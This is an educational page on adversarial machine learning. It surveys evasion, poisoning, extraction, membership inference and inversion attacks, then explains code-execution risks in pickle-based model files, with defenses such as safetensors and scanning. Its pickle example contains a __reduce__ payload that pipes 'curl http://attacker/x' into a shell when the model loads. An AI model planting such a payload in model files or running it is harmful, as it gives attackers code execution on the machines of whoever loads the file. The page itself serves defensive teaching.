Skip to content

Adversarial machine learning

A decade of work that still governs any classifier in an estate (fraud, malware, vision, biometrics) and underlies the embedding, multimodal, and infra attacks later. Five families, each with a worked example.

FamilyTarget / assetCanonical example
EvasionInference-time decisionFGSM/PGD perturbations flip a malware or image classifier (Goodfellow; Madry)
Poisoning / backdoorTraining/fine-tune dataBadNets trigger: model behaves until it sees the attacker’s cue (Gu)
ExtractionModel IP via APIRebuild a functional copy from query/response pairs (Tramèr)
Membership inferenceTraining-set privacyWas this record used to train? (Shokri)
Model inversionTraining-data reconstructionRecover representative faces from a recognition model (Fredrikson)
Worked example - the adversarial-example principle (FGSM, illustrative)
# A tiny perturbation in the direction that most increases the model's loss
# flips the prediction while looking unchanged to a human.
perturbation = epsilon * sign( gradient_of_loss_wrt_input ) # epsilon ~ a few /255
adversarial_image = original_image + perturbation
# model(original_image) -> "stop sign" (0.98)
# model(adversarial_image) -> "speed limit" (0.91) visually identical
# DEFENSE: adversarial training (train on such examples), input
# transformation/randomization, and report robustness under PGD, not just FGSM.

That single idea - move along the gradient of the loss - underlies the whole family; stronger attacks (PGD) just iterate it, and transfer means an attacker can craft it on a surrogate model and fire it at yours (II.18 covers the text-domain analogue).

Canon

  • Goodfellow 2014 — Explaining & Harnessing Adversarial Examples (FGSM) — arXiv:1412.6572
  • Madry 2017 — Resistance to Adversarial Attacks (PGD) — arXiv:1706.06083
  • Gu 2017 — BadNets - backdoor attacks — arXiv:1708.06733
  • Tramèr 2016 — Stealing ML Models via Prediction APIs — USENIX Security

▸ For the organization

  • Inventory every model making a security or eligibility decision; pen-test it as a tamperable control.
  • If you fine-tune or run RAG, treat the data pipeline as attacker-reachable: validate sources, sign datasets, test for backdoors before promotion.
  • Rate-limit and monitor prediction APIs against extraction.

Model files are executable: serialization & deserialization attacks

A trained model ships as a file, and the common formats are not inert data - they run code when loaded. Python’s pickle (used by PyTorch’s torch.load, scikit-learn, and joblib), plus TensorFlow/Keras Lambda layers, TorchScript, and HDF5, all permit executable callbacks during deserialization. Loading an attacker’s model file is therefore arbitrary code execution on the machine that loads it - a supply-chain RCE that needs no exploit, just model.load(). The pickle RCE primitive has been known since 2011; what changed is that model-sharing hubs turned it into a distribution channel.

Worked example - the pickle RCE primitive (illustrative)
# pickle calls __reduce__ on load to reconstruct an object; an attacker
# returns a callable + args, and the "reconstruction" runs their code.
class Payload:
def __reduce__(self):
import os
return (os.system, ("curl http://attacker/x | sh",)) # runs on torch.load()
# Saved into a .bin/.pt/.pkl model, this executes the moment a victim loads it.
# DEFENSE: never load untrusted pickle; prefer safetensors (weights only, no code);
# PyTorch weights_only=True is the default since v2.6; scan in CI before promotion.

This is live, not theoretical. JFrog found a Hugging Face model carrying a silent reverse-shell backdoor in 2024; in February 2025 ReversingLabs disclosed nullifAI, where deliberately “broken” pickle files executed a reverse shell while evading Hugging Face’s picklescan. One study tracked a roughly 5× year-over-year rise in malicious model uploads, on a hub where pickle repositories still see billions of downloads a month. Hugging Face scans uploads (ClamAV for malware, picklescan for pickle imports, TruffleHog for secrets) but marks rather than blocks unsafe models - the download-and-run decision is still yours.

Defenses for the model artifact

  • Prefer safetensors - it encodes only tensor data, no executable opcodes, so the deserialization-RCE class is designed out.
  • Use restricted loaders - PyTorch’s weights-only unpickler (weights_only=True) is the default from v2.6, refusing arbitrary callables on load.
  • Scan every third-party model in CI - ModelScan (Protect AI), Fickling (Trail of Bits), and picklescan as a promotion gate before a model reaches a registry.
  • Treat model files as untrusted executables - sandbox loading of anything unverified, and require provenance/signing before use (§16).

Sources

  • ReversingLabs 2025 — nullifAI - malicious models evading picklescan — reversinglabs.com, Feb 2025
  • JFrog 2024 — Malicious HF model, silent backdoor — jfrog.com
  • PyTorch / HF — weights-only unpickler (default v2.6+); safetensors — safe model format